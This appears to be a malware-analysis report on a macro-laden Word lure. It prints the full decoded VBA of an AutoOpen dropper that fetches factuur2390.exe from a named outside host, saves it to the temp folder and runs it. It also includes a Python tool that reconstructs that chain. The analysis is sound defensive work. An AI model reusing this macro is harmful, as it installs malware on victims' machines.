Risk Score: 238 (MALICIOUS)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
- T1566.001 Spearphishing Attachment
The sample contains VBA macros that trigger on AutoOpen. The macro requests 'http://geobrugg.co.kr/bbs/factuur2390.exe' with a synchronous MSXML2.XMLHTTP GET, writes the response body through an ADODB.Stream into the user's temporary directory (Environ("tmp")) under the URL's own file name, factuur2390.exe, and then launches that file with ShellExecuteA imported from shell32.dll. Every variable, procedure and module name is replaced with a hash-like string and the download and execution steps are split into two class modules, which hinders keyword scanning and manual reading but does not change the behaviour. The document body prompts the user to enable macros, indicating a social engineering lure.
Heuristics (9)

- VBA macros detected [medium] (5 related findings)
  OLE_VBA_MACROS: Document contains VBA macro code.
- VBA downloads and writes a file to disk [critical]
  OLE_VBA_HTTP_DROP_EXEC: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script: `afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Write ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.responseBody`
- CreateObject call [high]
  OLE_VBA_CREATEOBJ: CreateObject call.
  Matched line in script: `Set ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d = CreateObject("MSXML2.XMLHTTP")`
- VBA p-code auto-exec with execution tokens [high]
  OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low]
  OLE_VBA_AUTOOPEN: AutoOpen macro.
  Matched line in script: `Sub AutoOpen()`
- Environ() call (env variable access) [low]
  OLE_VBA_ENVIRON: Environ() call (env variable access).
  Matched line in script: `a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3 = Environ("tmp") & "\" & Mid(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, InStrRev(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, "/") + 1, Len(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351))`
- Reference to ShellExecute API [high]
  SC_STR_SHELLEXEC: Reference to ShellExecute API.
- Legacy WordBasic auto-exec macro marker [medium]
  OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (The rule text is generic; for this sample a VBA project was in fact recovered as macros.bas, so the marker corroborates the AutoOpen finding rather than adding an independent execution path.)
- Embedded URL [info]
  EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://geobrugg.co.kr/bbs/factuur2390.exe (referenced by macro; the payload download and the only network indicator in this list)
  - http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro; OOXML schema namespace URI, not a network indicator)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (referenced by macro; OOXML schema namespace URI, not a network indicator)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (referenced by macro; OOXML schema namespace URI, not a network indicator)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4908 bytes | 2ecd3311e4fa7642ef7bd2e38456ce107f79c2a91faa3c8df5f576eea6f7f2c7 |
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aa895840058ed4c70ae08"
Sub AutoOpen()
Dim afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e3 As New a9b01089d6b064bdc85d0
Dim a14cd0e0b60bb4e2abdee537820a7a09810e5ce7329c54c6c82abfd49caafdf5a As New ac57e47e0346046678ddb
a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351 = "http://geobrugg.co.kr/bbs/factuur2390.exe"
a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3 = Environ("tmp") & "\" & Mid(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, InStrRev(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, "/") + 1, Len(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351))
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e3.a8ecbd4bdee184464bdce3ad8375f3cf57989b35d8c2b43d8a75f5ae0f3670b38 a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3
a14cd0e0b60bb4e2abdee537820a7a09810e5ce7329c54c6c82abfd49caafdf5a.a0e262c471bbe4db7ab32f42704697b0674eb310c83b742789265b39fb073885e a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3
End Sub
Attribute VB_Name = "a9b01089d6b064bdc85d0"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub a8ecbd4bdee184464bdce3ad8375f3cf57989b35d8c2b43d8a75f5ae0f3670b38(a02365916d1854214a69bde788dabeca0708f0530f64a4989accb58909a9c80c9, a98ee337513494e8cb897104e5fcf80b6a9a2da3ec0924d6b8187993a63b38957)
Set ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d = CreateObject("MSXML2.XMLHTTP")
Set afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30 = CreateObject("ADODB.Stream")
ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.Open "GET", a02365916d1854214a69bde788dabeca0708f0530f64a4989accb58909a9c80c9, False
ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.send
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Type = 1
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Open
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Write ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.responseBody
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.SaveToFile a98ee337513494e8cb897104e5fcf80b6a9a2da3ec0924d6b8187993a63b38957, 2
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Close
End Sub
Attribute VB_Name = "ac57e47e0346046678ddb"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 Then
Private Declare PtrSafe Function afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e31 Lib "shell32.dll" Alias "ShellExecuteA" (ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e32 As Integer, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e33 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e34 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e36 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e37 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e38 As Integer) As Integer
#Else
Private Declare Function afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e31 Lib "shell32.dll" Alias "ShellExecuteA" (ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e32 As Integer, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e33 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e34 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e36 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e37 As String, ByVal afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e38 As Integer) As Integer
#End If
Sub a0e262c471bbe4db7ab32f42704697b0674eb310c83b742789265b39fb073885e(afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e39)
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e31 0, "open", afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e39, "", "", 1
End Sub
```
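The download, drop and execute chain summarised under Malware Insights, and the dynamically-built-ProgID case that the OLE_VBA_HTTP_DROP_EXEC heuristic mentions, can both be recovered mechanically from the obfuscated source above. The Python below is an added example, not part of this report or of the analyzer's own code. It works on a constructed excerpt of the extracted macro (Attribute lines and the non-VBA7 Declare branch dropped, the Declare's parameter names shortened; all other identifiers are the sample's own), traces the hash-like names across Sub boundaries by binding formal parameters to call-site arguments, evaluates the Environ("tmp") & "\" & Mid(...) path expression, and folds "a" & Chr(n) & "b" concatenations inside CreateObject before matching ProgIDs. It assumes single-assignment string variables and no commas inside string arguments, which holds for this sample.

```python
import json
import re

# Constructed sample input: the logic-bearing statements of the macro extracted
# above (Attribute lines and the non-VBA7 Declare branch dropped, Declare
# parameter names shortened). Identifiers are the sample's own obfuscated names.
MACRO = r'''
Sub AutoOpen()
Dim afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e3 As New a9b01089d6b064bdc85d0
Dim a14cd0e0b60bb4e2abdee537820a7a09810e5ce7329c54c6c82abfd49caafdf5a As New ac57e47e0346046678ddb
a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351 = "http://geobrugg.co.kr/bbs/factuur2390.exe"
a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3 = Environ("tmp") & "\" & Mid(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, InStrRev(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, "/") + 1, Len(a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351))
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e3.a8ecbd4bdee184464bdce3ad8375f3cf57989b35d8c2b43d8a75f5ae0f3670b38 a1e0c6963c7864b0792996553e161622070a8f7c7ffce4ef598b9da63d3b43351, a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3
a14cd0e0b60bb4e2abdee537820a7a09810e5ce7329c54c6c82abfd49caafdf5a.a0e262c471bbe4db7ab32f42704697b0674eb310c83b742789265b39fb073885e a040c225596454b66b7f2308ab7ddd550f4951d8d38c84b8e8d46b853e2c0f4d3
End Sub
Sub a8ecbd4bdee184464bdce3ad8375f3cf57989b35d8c2b43d8a75f5ae0f3670b38(a02365916d1854214a69bde788dabeca0708f0530f64a4989accb58909a9c80c9, a98ee337513494e8cb897104e5fcf80b6a9a2da3ec0924d6b8187993a63b38957)
Set ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d = CreateObject("MSXML2.XMLHTTP")
Set afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30 = CreateObject("ADODB.Stream")
ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.Open "GET", a02365916d1854214a69bde788dabeca0708f0530f64a4989accb58909a9c80c9, False
ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.send
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Type = 1
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Open
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Write ad3af1251e45844b3be2e47fd5d7c4f9e4d9d698aa4394685bb22361d21891d1d.responseBody
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.SaveToFile a98ee337513494e8cb897104e5fcf80b6a9a2da3ec0924d6b8187993a63b38957, 2
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e30.Close
End Sub
Private Declare PtrSafe Function afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e31 Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Integer, ByVal op As String, ByVal file As String, ByVal params As String, ByVal dir As String, ByVal show As Integer) As Integer
Sub a0e262c471bbe4db7ab32f42704697b0674eb310c83b742789265b39fb073885e(afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e39)
afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e31 0, "open", afc61558dba7e4c8bbac599d1d01d5251adefe4e946ec4a8fad3fa524db9764e39, "", "", 1
End Sub
'''

# One regex per VBA construct the dropper relies on.
STR_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)
ENV_JOIN = re.compile(r'^\s*(\w+)\s*=\s*Environ\("(\w+)"\)\s*&\s*"\\"\s*&\s*'
                      r'Mid\((\w+),\s*InStrRev\(\3,\s*"/"\)\s*\+\s*1,\s*Len\(\3\)\)\s*$', re.M | re.I)
CREATE_OBJ = re.compile(r'^\s*Set\s+(\w+)\s*=\s*CreateObject\((.*?)\)\s*$', re.M | re.I)
SUB_DEF = re.compile(r'^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)\(([^)]*)\)', re.M | re.I)
DECLARE = re.compile(r'^\s*(?:Private\s+|Public\s+)?Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+'
                     r'(\w+)\s+Lib\s+"([^"]+)"\s+Alias\s+"([^"]+)"', re.M | re.I)
CALL = re.compile(r'^\s*(?:(\w+)\.)?(\w+)\s+([^\n=]+)$', re.M)   # [obj.]proc arg, arg, ...
HTTP_OPEN = re.compile(r'^\s*(\w+)\.Open\s+"GET",\s*(\w+)', re.M | re.I)
SAVE_TO_FILE = re.compile(r'^\s*(\w+)\.SaveToFile\s+(\w+)', re.M | re.I)
AUTO_EXEC = {"autoopen", "autoexec", "autoclose", "document_open", "workbook_open", "auto_open"}


def _params(sig):
    """'ByVal a As String, b' -> ['a', 'b']."""
    names = [re.sub(r"^(ByVal|ByRef|Optional)\s+", "", p.strip(), flags=re.I).split(" As ")[0]
             for p in sig.split(",")]
    return [n for n in names if n]


def _args(text):
    return [a.strip() for a in text.split(",")]   # no commas inside literals in this sample


def fold_progid(expr):
    """Fold Chr(n) and "a" & "b" pieces so a dynamically built ProgID compares as a literal."""
    expr = re.sub(r"Chr\$?\(\s*(\d+)\s*\)", lambda m: '"%s"' % chr(int(m.group(1))), expr, flags=re.I)
    prev = None
    while prev != expr:
        prev, expr = expr, re.sub(r'"([^"]*)"\s*&\s*"([^"]*)"', r'"\g<1>\g<2>"', expr)
    return expr.strip().strip('"')


def _resolve(name, values, aliases):
    """Follow formal-parameter -> call-site-argument bindings until a known literal is reached."""
    seen = set()
    while name not in values and name in aliases and name not in seen:
        seen.add(name)
        name = aliases[name]
    return values.get(name, name.strip('"'))


def reconstruct_chain(src):
    values = dict(STR_ASSIGN.findall(src))                 # variable -> string literal
    subs = {n: _params(p) for n, p in SUB_DEF.findall(src)}
    calls = CALL.findall(src)                               # (object, procedure, raw args)
    aliases = {}                                            # formal parameter -> actual argument
    for _obj, proc, raw in calls:
        if proc in subs:
            aliases.update(zip(subs[proc], _args(raw)))
    for var, env, urlvar in ENV_JOIN.findall(src):         # %ENV%\<basename of the URL>
        url = _resolve(urlvar, values, aliases)
        values[var] = f"%{env.upper()}%\\{url.rsplit('/', 1)[-1]}"
    progids = {var: fold_progid(e) for var, e in CREATE_OBJ.findall(src)}
    chain = {"auto_exec": sorted(n for n in subs if n.lower() in AUTO_EXEC),
             "progids": sorted(set(progids.values())),
             "download_url": None, "drop_path": None, "exec_api": None, "exec_target": None}
    m = HTTP_OPEN.search(src)
    if m and "HTTP" in progids.get(m.group(1), "").upper():
        chain["download_url"] = _resolve(m.group(2), values, aliases)
    m = SAVE_TO_FILE.search(src)
    if m and progids.get(m.group(1), "").upper() == "ADODB.STREAM":
        chain["drop_path"] = _resolve(m.group(2), values, aliases)
    for name, lib, alias in DECLARE.findall(src):
        if not alias.lower().startswith("shellexecute"):
            continue
        for _obj, proc, raw in calls:
            if proc == name and len(_args(raw)) > 2:        # lpFile is the third argument
                chain["exec_api"] = f"{lib}!{alias}"
                chain["exec_target"] = _resolve(_args(raw)[2], values, aliases)
    return chain


if __name__ == "__main__":
    print(json.dumps(reconstruct_chain(MACRO), indent=2))
```

Run as a script it prints the chain as JSON: AutoOpen as the trigger, the two ProgIDs, the download URL, `%TMP%\factuur2390.exe` as both the drop path and the ShellExecuteA target. The `fold_progid` pass is what keeps the ProgID match alive when a variant spells the object as `"ADO" & Chr(68) & "B.Stream"` instead of the literal; the rest of the tracing is unaffected because it keys on the call shape, not on the names.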